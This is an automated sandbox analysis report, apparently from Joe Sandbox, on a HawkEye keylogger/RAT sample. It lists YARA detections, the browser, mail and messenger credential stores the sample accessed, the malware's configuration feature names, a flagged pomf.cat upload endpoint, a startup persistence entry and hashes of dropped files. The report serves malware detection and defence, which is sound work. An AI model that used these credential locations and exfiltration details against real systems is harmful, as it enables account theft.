Source: Yara match	File source: 00000004.00000002.403557593.0000000031EE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.602404324.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6852, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6476, type: MEMORY
Source: Yara match	File source: Process Memory Space: xjyxibeifbdmock.exe PID: 6828, type: MEMORY
Source: Yara match	File source: Process Memory Space: b15023b1855da1cf5213b061dc626cc2.exe PID: 6432, type: MEMORY
Source: Yara match	File source: 4.2.xjyxibeifbdmock.exe.31ee0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.b15023b1855da1cf5213b061dc626cc2.exe.32130000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.xjyxibeifbdmock.exe.31ee0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.b15023b1855da1cf5213b061dc626cc2.exe.32130000.1.raw.unpack, type: UNPACKEDPE

Yara detected MailPassView

Show sources

Source: Yara match	File source: 00000001.00000002.608241206.00000000035AF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.608017137.0000000002F0D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.608578652.0000000004D10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.397841054.0000000004583000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.609144823.00000000068B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.608991770.00000000053B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.502433502.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.609395469.0000000006F61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.540468694.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.361093839.0000000004C23000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 3252, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 6280, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6852, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6476, type: MEMORY
Source: Yara match	File source: 5.2.RegAsm.exe.4d10000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.4d10000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegAsm.exe.53b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegAsm.exe.53b0000.1.raw.unpack, type: UNPACKEDPE

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data			Jump to behavior

Tries to steal Instant Messenger accounts or passwords

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt	Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail	Jump to behavior

Tries to steal Mail credentials (via file registry)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword	13_2_00402D74
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword	13_2_00402D74
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: ESMTPPassword	13_2_004033B1

Yara detected WebBrowserPassView password recovery tool

Show sources

Source: Yara match	File source: 00000005.00000002.606139905.0000000002DD2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.608578652.0000000004D10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.397841054.0000000004583000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.609144823.00000000068B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.608991770.00000000053B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.609395469.0000000006F61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.606262904.0000000003472000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.361093839.0000000004C23000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 6576, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 6948, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6852, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6476, type: MEMORY
Source: Yara match	File source: 5.2.RegAsm.exe.4d10000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.4d10000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegAsm.exe.53b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegAsm.exe.53b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Detected HawkEye Rat

Show sources

Source: b15023b1855da1cf5213b061dc626cc2.exe, 00000000.00000002.368012063.0000000032130000.00000004.00000001.sdmp	String found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles
Source: RegAsm.exe, 00000001.00000002.602404324.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles
Source: xjyxibeifbdmock.exe, 00000004.00000002.403557593.0000000031EE0000.00000004.00000001.sdmp	String found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles
Source: RegAsm.exe, 00000005.00000002.602420435.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles

Yara detected HawkEye Keylogger

Show sources

Source: Yara match	File source: 00000000.00000002.368012063.0000000032130000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.605834694.0000000002D29000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.606017869.00000000033C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.602420435.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.403557593.0000000031EE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.602404324.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6852, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6476, type: MEMORY
Source: Yara match	File source: Process Memory Space: xjyxibeifbdmock.exe PID: 6828, type: MEMORY
Source: Yara match	File source: Process Memory Space: b15023b1855da1cf5213b061dc626cc2.exe PID: 6432, type: MEMORY
Source: Yara match	File source: 4.2.xjyxibeifbdmock.exe.31ee0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.b15023b1855da1cf5213b061dc626cc2.exe.32130000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.xjyxibeifbdmock.exe.31ee0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.b15023b1855da1cf5213b061dc626cc2.exe.32130000.1.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation111	Startup Items1	Startup Items1	Disable or Modify Tools1	OS Credential Dumping1	System Time Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API11	DLL Side-Loading1	DLL Side-Loading1	Deobfuscate/Decode Files or Information11	Credentials in Registry2	Account Discovery1	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Remote Access Software1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Shared Modules1	Application Shimming1	Application Shimming1	Obfuscated Files or Information2	Credentials In Files1	File and Directory Discovery2	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Command and Scripting Interpreter2	Registry Run Keys / Startup Folder2	Process Injection512	Software Packing1	NTDS	System Information Discovery19	Distributed Component Object Model	Clipboard Data1	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Registry Run Keys / Startup Folder2	DLL Side-Loading1	LSA Secrets	Security Software Discovery36	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading1	Cached Domain Credentials	Virtualization/Sandbox Evasion23	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion23	DCSync	Process Discovery4	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection512	Proc Filesystem	System Owner/User Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
b15023b1855da1cf5213b061dc626cc2.exe	61%	Virustotal		Browse
b15023b1855da1cf5213b061dc626cc2.exe	51%	Metadefender		Browse
b15023b1855da1cf5213b061dc626cc2.exe	65%	ReversingLabs	Win32.Backdoor.Androm
b15023b1855da1cf5213b061dc626cc2.exe	100%	Avira	TR/Dropper.Gen
b15023b1855da1cf5213b061dc626cc2.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe	62%	ReversingLabs	Win32.Backdoor.Androm

Unpacked PE Files

Source	Detection	Scanner	Label	Download
4.2.xjyxibeifbdmock.exe.150000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
2.2.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1125438	Download File
1.2.RegAsm.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
0.2.b15023b1855da1cf5213b061dc626cc2.exe.a30000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
4.0.xjyxibeifbdmock.exe.150000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
6.2.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1125438	Download File
5.2.RegAsm.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
0.0.b15023b1855da1cf5213b061dc626cc2.exe.a30000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://a.pomf.cat/	4%	Virustotal		Browse
https://a.pomf.cat/	0%	Avira URL Cloud	safe
http://pomf.cat/upload.php&https://a.pomf.cat/	0%	Avira URL Cloud	safe
http://pomf.cat/upload.php	9%	Virustotal		Browse
http://pomf.cat/upload.php	0%	Avira URL Cloud	safe
https://2542116.fls.doubleM	0%	Avira URL Cloud	safe
http://pomf.cat/upload.phpCContent-Disposition:	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629	vbc.exe, 00000002.00000003.368921310.0000000002212000.00000004.00000001.sdmp, vbc.exe, 00000002.00000003.368809279.0000000002210000.00000004.00000001.sdmp, vbc.exe, 00000002.00000003.369053591.0000000002213000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.404653728.00000000020E2000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.404525940.00000000020E0000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.404912057.00000000020E3000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.404720258.00000000020E1000.00000004.00000001.sdmp	false		high
https://a.pomf.cat/	RegAsm.exe, 00000001.00000002.605985687.00000000033C3000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.605786252.0000000002D23000.00000004.00000001.sdmp	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1LMEM	vbc.exe, 00000002.00000002.370773894.000000000076D000.00000004.00000020.sdmp	false		high
http://pomf.cat/upload.php&https://a.pomf.cat/	b15023b1855da1cf5213b061dc626cc2.exe, 00000000.00000002.368012063.0000000032130000.00000004.00000001.sdmp, RegAsm.exe, 00000001.00000002.602404324.0000000000402000.00000040.00000001.sdmp, xjyxibeifbdmock.exe, 00000004.00000002.403557593.0000000031EE0000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.602420435.0000000000402000.00000040.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://pomf.cat/upload.php	RegAsm.exe, 00000001.00000002.605985687.00000000033C3000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.605786252.0000000002D23000.00000004.00000001.sdmp	true	9%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://2542116.fls.doubleM	vbc.exe, 00000002.00000002.370773894.000000000076D000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2	vbc.exe, 00000006.00000003.404525940.00000000020E0000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.404912057.00000000020E3000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.404720258.00000000020E1000.00000004.00000001.sdmp	false		high
http://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.co	vbc.exe, 00000006.00000003.404525940.00000000020E0000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.404912057.00000000020E3000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.404720258.00000000020E1000.00000004.00000001.sdmp	false		high
https://login.yahoo.com/config/login	vbc.exe	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://c	vbc.exe, 00000006.00000003.404525940.00000000020E0000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.404912057.00000000020E3000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.404720258.00000000020E1000.00000004.00000001.sdmp	false		high
http://www.nirsoft.net	vbc.exe, 00000002.00000002.370154038.000000000019C000.00000004.00000010.sdmp, vbc.exe, 00000006.00000002.405184269.000000000019C000.00000004.00000010.sdmp	false		high
http://www.nirsoft.net/	vbc.exe, 00000013.00000002.540468694.0000000000400000.00000040.00000001.sdmp	false		high
https://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&	vbc.exe, 00000006.00000003.404525940.00000000020E0000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.404912057.00000000020E3000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.404720258.00000000020E1000.00000004.00000001.sdmp	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1LMEM	vbc.exe, 00000002.00000002.370773894.000000000076D000.00000004.00000020.sdmp	false		high
http://bot.whatismyipaddress.com/	RegAsm.exe, 00000005.00000002.605786252.0000000002D23000.00000004.00000001.sdmp	false		high
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736	vbc.exe, 00000002.00000002.370849978.0000000002214000.00000004.00000001.sdmp, vbc.exe, 00000006.00000002.405655164.00000000020E4000.00000004.00000001.sdmp	false		high
http://pomf.cat/upload.phpCContent-Disposition:	RegAsm.exe, 00000001.00000002.605985687.00000000033C3000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.605786252.0000000002D23000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	320480
Start date:	19.11.2020
Start time:	12:02:22
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	b15023b1855da1cf5213b061dc626cc2 (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.phis.troj.spyw.evad.winEXE@14/5@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 89.9% (good quality ratio 83.1%) Quality average: 75.9% Quality standard deviation: 30%
HCA Information:	Successful, ratio: 77% Number of executed functions: 265 Number of non-executed functions: 269
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing disassembly code.

Simulations

Behavior and APIs

Time	Type	Description
12:03:27	API Interceptor	2x Sleep call for process: RegAsm.exe modified
12:03:27	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xjyxibeifbdmock.eu.url
12:03:41	API Interceptor	1x Sleep call for process: xjyxibeifbdmock.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\ecfc61d0-e5dc-e5e1-276d-ec9f9689ba6d Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	88
Entropy (8bit):	5.490292840056112
Encrypted:	false
SSDEEP:	3:PFYyImXF9mN2RVQON4NgCkCAUdXM:PHRB6+C3xy
MD5:	454353131947D1483FF5470107478978
SHA1:	C559163C23E5F878BE85D05F3EDEEAA620173C3D
SHA-256:	2DF94DC1C58E952A1EBD1AE1185A291A8A573982CA90EC1BBB87B81126002668
SHA-512:	C8912DA4654C735F7618B0ABEA7EC0197B17E6E072718B825B5799B2E88CC0E8AE8245CA95E1E5955C3AB8F649CA4ED6529975B142B061ECC402D935401B84DE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	LeNF7Goy7uuKWKsmWAhDmhEi2BbZGy27JQQaO8wc/LiRcthbCBcu+4Nt6yYR3dz6dYTg/ZHS1axBPoq2xePo2w==

C:\Users\user\AppData\Local\Temp\tmp992B.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
File Type:	Little-endian UTF-16 Unicode text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Reputation:	high, very likely benign file
Preview:	..

C:\Users\user\AppData\Local\Temp\tmpDC10.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
File Type:	Little-endian UTF-16 Unicode text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Reputation:	high, very likely benign file
Preview:	..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xjyxibeifbdmock.eu.url Download File
Process:	C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe
File Type:	data
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.455918016210675
Encrypted:	false
SSDEEP:	3:8uRkiglZlvq5UfKl8lGjLlAdVdhOEjl3QlMIolCl761EC6l4BY7QlAldal:7glZoKfK4XUEZglJPZ7BR716l
MD5:	5D0D1DE1B06B58890AA881EE518BAB84
SHA1:	B1F30C5D5D21BE9A75C1265DE6ABAD72611776DC
SHA-256:	10094922198B9938D46607B73B5433DC47FB4160C7076750F5E7650D07EFE80C
SHA-512:	BC8A58F6BB7241DE9A365AEE00ADFB60B18E5DD067F403BE93DBF30D0B72B3719174D9123A6FFCB60DA712ED09D3179973759B453D94E7DFAE0DCE8DBAA6C716
Malicious:	true
Reputation:	low
